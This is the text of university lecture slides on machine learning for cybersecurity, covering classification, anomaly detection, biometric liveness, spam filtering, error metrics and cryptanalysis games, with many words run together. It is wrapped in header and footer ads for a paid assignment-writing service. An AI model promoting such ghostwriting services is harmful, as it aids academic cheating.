计算机代写 FIT2093 INTRODUCTION TO CYBERSECURITY

Week 11 Lecture
Machine Learning / AI for Cybersecurity
FIT2093 INTRODUCTION TO CYBERSECURITY
www.monash.edu.au

Machine Learning for Cybersecurity
● Machine learning: What is it?
○ typesoflearning
○ typesofmachinelearningproblems
○ generativevsdiscriminativemodels
○ e.g.patternrecognition,featureextraction

Machine Learning for Cybersecurity
● Machine learning for CyberSecurity problems ○ binaryclassification
○ anomalydetection
○ liedetection
○ biometrics
○ spamclassification
○ Tasksinclassification ○ ClassificationMetrics ○ cryptography

● Question
Machine Learning for Cybersecurity
● Q:GiveanexamplescenariowhereyouthinkMachineLearning/AImight be used to defend a system against attacks.

● Question
Machine Learning for Cybersecurity
● Q:GiveanexamplescenariowhereyouthinkMachineLearning/AImight be used to attack a system.
Activity (5 mins)
1) Click the latest link in the Zoom chat
2) Add your question response to the Ed forum
3) Add your “hearts” to your favourite responses

Machine Learning: What is it?

Machine Learning: What is it?
Machine Learning for Cybersecurity
● Machinelearning
○ learnfromexperience,improveovertime
• learn to do what?
• how to improve?
• with time, what experience is enhanced?
● Includes but is not just optimization
○ maxorminsomeobjectivefunctions.t.someconstraints

# Machine Learning: What is it? #
Machine Learning for Cybersecurity
● Machine learning: learn from experience, improve over time ○ learntodo
• classification: choose 1 of N labels/categories/classes
• regression: predict numerical values

# Machine Learning: What is it? #
Machine Learning for Cybersecurity
● Machine learning: learn from experience, improve over time ○ learntodo
• clustering: group similar samples
• density estimation: construct the probability distribution of observed samples

# Machine Learning: What is it? #
Machine Learning for Cybersecurity
● Machine learning: learn from experience, improve over time ○ learntodo
• association rule learning: discover relations between samples
• dimensionality reduction / feature learning / representation learning: reduce the dimensions of features in the dataset of samples

# Machine Learning: What is it? #
Machine Learning for Cybersecurity
● Machine learning: learn from experience, improve over time ○ learntodo
• reinforcement learning: game-like training to max the reward vs penalty

Machine Learning: What is it?
Machine Learning for Cybersecurity
● Machine learning: learn from experience, improve over time ○ howtoimprove?
• ↑ accuracy of prediction/estimation,
• ↓ difference from desired
○ withtime,whatexperienceisenhanced?
• see more (labelled) samples e.g. (un)supervised learning
• more interactions (reinforcement learning)

# Machine Learning: What is it? #
Machine Learning for Cybersecurity
● supervisedlearning:we’llfocusonthis,mostcommon ○ groundtruthsamplesavailablewithclasslabels
● unsupervisedlearning
○ sampleswithoutlabels,nogroundtruth
● semi-supervised: samples with & without labels ● reinforcement learning
○ nosamples,learnfrominteractions&correspondingreward/payoff 13

# Machine Learning: What is it? #
Machine Learning for Cybersecurity
● DiscriminativeModel
○ learnthedecisionboundarybetweenclasses
among samples
○ predicttheclasslabel
● GenerativeModel
○ modeltheunderlyingdistributionofthesamples ○ cangeneratenewsamplesfromsamedistribution

Pattern Recognition ⊂ Machine Learning Machine Learning for Cybersecurity
● patternrecognition=featurelearningthenclassification ○ cantreateachstageasablackbox,variousoptions
● e.g. for fingerprint biometrics ○ feature=minutiae

# Fingerprint Minutiae #
Machine Learning for Cybersecurity

Pattern Recognition
Machine Learning for Cybersecurity
● biometrics=patternrecognitionappliedtoasecurityproblem
● Q:Whyneedtodofeatureextraction?Whynotdirectlyclassify?

Feature Extraction
Machine Learning for Cybersecurity
● Q: Why need to do feature extraction? Why not directly classify?
● A: this allows to obtain various projection views, features from various viewpoints are suited for different classification problems
e.g. top-down view of a human does not help to predict his/her height, side view is better

Machine Learning for CyberSecurity Problems

Security Problems as Classification Problems Machine Learning for Cybersecurity
● binary classification
○ 2classes/categories
○ involvesfeatureextraction/learning before classification
● not everything is useful, some redundant / noise-like
● we only need to focus on some key aspects

Anomaly Detection as Binary Classification Machine Learning for Cybersecurity
● binary classification: 2 classes
○ normal/abnormal
○ benign/malicioustraffic/behavioure.g.intrusion/malwaredetection ○ (I)detectpresenceofknownmalicioussignatures
○ (II)detectabsenceofknownnormalbehaviour
● Q:whenisapproach(II)betterthan(I)?
● Q: when will both approaches not work?
● Q: how could an attacker cause both approaches to fail?

Lie Detection as Binary Classification Machine Learning for Cybersecurity
● liedetection:
○ innocentvssuspicious
• e.g. presence of micro-expressions
• subtle facial movements, fraction of a second
• involuntary, sub-conscious reaction to emotion

Biometrics as Multiclass Classification Machine Learning for Cybersecurity
● Biometrics identification: ○ eachIDisaclasslabel
○ multi-classclassification

Biometrics as Multiclass Classification Machine Learning for Cybersecurity
○ biometricsforgeryproblem
• biometrics considered by most to be highly unforgeable
• thus much reliance & false sense of security due to this assumption
• thus consequences devastating if forged
○ anti-forgerysolution:livenessdetection
• real vs forgery/fake
• assumption: real has liveness, fake does not
• e.g. sweat, pulsation, capacitance, …

Biometrics as Multiclass Classification Machine Learning for Cybersecurity
● counteranti-forgeryattackse.g.[Bowden-Petersetal.2012] ○ Q:whylivenessdetectionnotwork?
• liveness separately detected from feature extraction
Live / Not Live
Liveness Detect

Spam Detection as Binary Classification Machine Learning for Cybersecurity
● Spam detection:
○ SpamvsNon-Spam
○ datasetscomprisetheentries(label,text)
• where label ∈ {non-spam,spam}
○ couldusetheNaturalLanguageProcessing(NLP)
• breaks language into shorter pieces

Classification: Empirical Tasks
Machine Learning for Cybersecurity
● separate dataset into training set & test set
● train/buildtheclassifier
○ let it learn from seeing labelled samples from the training set,
learn the decision boundary
● test the classifier ○ …

Classification: Metrics
Machine Learning for Cybersecurity
● test the classifier
○ give it the samples from the test set, without the labels,
it should predict what the label is for each sample
○ compute the metrics:
○ accuracy = #correct / #totalSamples = (TP+TN) / (P+N)
○ precision=TP/allPpredictions=TP/(TP+FP)
○ recall=TP/allsamplesinthatclass=TP/(TP+FN) (a.k.a. TP rate or sensitivity)

Classification: Metrics
Machine Learning for Cybersecurity
● testtheclassifier:computethemetrics ○ accuracy
○ precision
○ F1score=harmonicmeanHofprecision&recall

Classification: Metrics
Machine Learning for Cybersecurity
● Recalllastlecture’salternativeclassificationmetrics ● (commonlyusedinbiometrics)
○ FalseAcceptRate(FAR)=FP/allNsamples=FP/(TN+FP) ○ comparewith(1-precision)=FP/(TP+FP)
○ FalseRejectRate(FRR)=FN/allPsamples=FN/(FN+TP) ○ comparewith(1-recall)=FN/(FN+TP)
Note: above definitions assume
P = ”positive” = “valid”, N= “negative” = “invalid” (see next slide)
QUESTION: Which metric do you think is more relevant for security classification (assume
P =“valid”, N = “invalid”):
FAR or (1-precision)? Why?
Valid and rejected
Invalid and rejected
Valid and accepted
invalid and accepted

A note on definitions
○ Definitionof“positive”(P)/“negative”(N)candependonthescenario/context ○ canbedefinedexplicitlyineachscenariotoavoidconfusion.
○ However, regardless of the definition of “Positive” or “Negative”:
○ Insecurityscenarios,thefollowingnaturalconventionforthemeaningofAcceptand
Reject is usually followed:
○ Accept=getsthroughsystem=(ifnoerrors)honest/valid/good ○ Reject = gets blocked = (if no errors) malicious/invalid/bad
○ ThereforeFARandFRRerrorratescanbedefinedgenerallyas:
○ False Accept Rate, FAR = (# of malicious samples falsely classified as accept)/(total # of malicious samples)
○ False Reject Rate, FRR = (# of honest samples falsely classified as reject)/(total # of honest samples)

Spam Detection as Binary Classification Machine Learning for Cybersecurity
● featurelearning
○ bagofwords(BoW)
• word & frequency
(1) John likes to watch movies. Mary likes movies too.
BoW = {“John”:1,”likes”:2,”to”:1,”watch”:1,”movies”:2,”Mary”:1,”too”:1};
(source: Wikipedia)

Spam Detection as Binary Classification Machine Learning for Cybersecurity
● classification
○ logisticregressionclassifier
• features (in this case, BoW incl frequency count) are input to sigmoid function
outputting a value between 0 and 1
i.e. probability p
• p>0.5→class=1,elseclass=0

Cryptanalysis as Binary Classification Machine Learning for Cybersecurity
○ CONFidentialityproblemaimstosafeguardsecrecyofmessagem
● How?ensureonlyspecificpartiescanaccess ○ lockitup:unlockonlyifhavekey
○ transformit:reversetransformneedsakey
• encryption 34

Encryption for CONF? Machine Learning for Cybersecurity
● Encrypt? c = E(m,k)
○ m=messagea.k.a.plaintextp ○ k=secretkey
○ c=outputciphertext
● Q:sincemneedstobeCONF,howtoensuremremainsCONFalthough c can be seen by anyone?

Breaking Encryption CONF
Machine Learning for Cybersecurity
● theendgoal=CONFofm, the means = CONF of k
● guessingkleadstobreakingCONFofm
● cryptanalysis = security analysis of crypto techniques e.g. encryption
● basic cryptanalysis of encryption = binary classification problem
○ we’ll discuss a few variations of cryptanalysis problems, any of these would
indicate some weakness in the encryption design

Cryptanalysis of Encryption: Case I
Machine Learning for Cybersecurity
○ choosessecretk
● Attacker ○ seesc
○ wantstoguessk
● Case I: key-recovery attack 38

Cryptanalysis of Encryption: Case II
Machine Learning for Cybersecurity
○ flipsacoin{0,1}
• if0:usek0 • if1:usek1
● Attacker ○ seesc
○ wantstoguessifk0 ork1
● CaseII:key-distinguishingattack
● Q: which is easier for attacker to do? Case I or II?

Cryptanalysis of Encryption: Case II
Machine Learning for Cybersecurity
○ flipsacoin{0,1}
• if0:usek0 • if1:usek1
● Attacker ○ seesc
○ wantstoguessifk0 ork1
● Q: which is easier for attacker to do? Case I or II? ● A: Case II is easier, just guess 1 of 2 options, vs
Case I i.e. guess all bits of k

Cryptanalysis of Encryption: Case III
Machine Learning for Cybersecurity
○ flipsacoin{0,1}
• if0:usem0 • if1:usem1
● Attacker ○ seesc
○ wantstoguessifm0 orm1
● CaseIII:plaintext-distinguishingattack
● CaseIIandCaseIIIwouldbesimilarlydifficultforthe
attacker since it is guessing 1 of 2 options

Cryptanalysis of Encryption: Case III
Machine Learning for Cybersecurity
○ flipsacoin{0,1}
• if0:usem0 • if1:usem1
● Attacker ○ seesc
○ wantstoguessifm0 orm1
● CaseIII:plaintext-distinguishingattack
● Q: what weakness or problem could cause an
attacker to be able guess if it is m0 or m1? 42

Further Reading
• A. Polyakov, ”Machine Learning for Cybersecurity”, article available at: https://towardsdatascience.com/machine-learning-for-cybersecurity-101-7822b802790b
• This article discusses most of the topics we discussed, and provides links to further references.
Note: Our focus in this week’s lecture is on a high-level overview on the types of ML techniques and their potential applications in cyber security. We do not expect students to learn the details of how ML algorithms work – this is outside the scope of this unit.

程序代写 CS代考加微信: powcoder QQ: 1823890830 Email: powcoder@163.com

Related Posts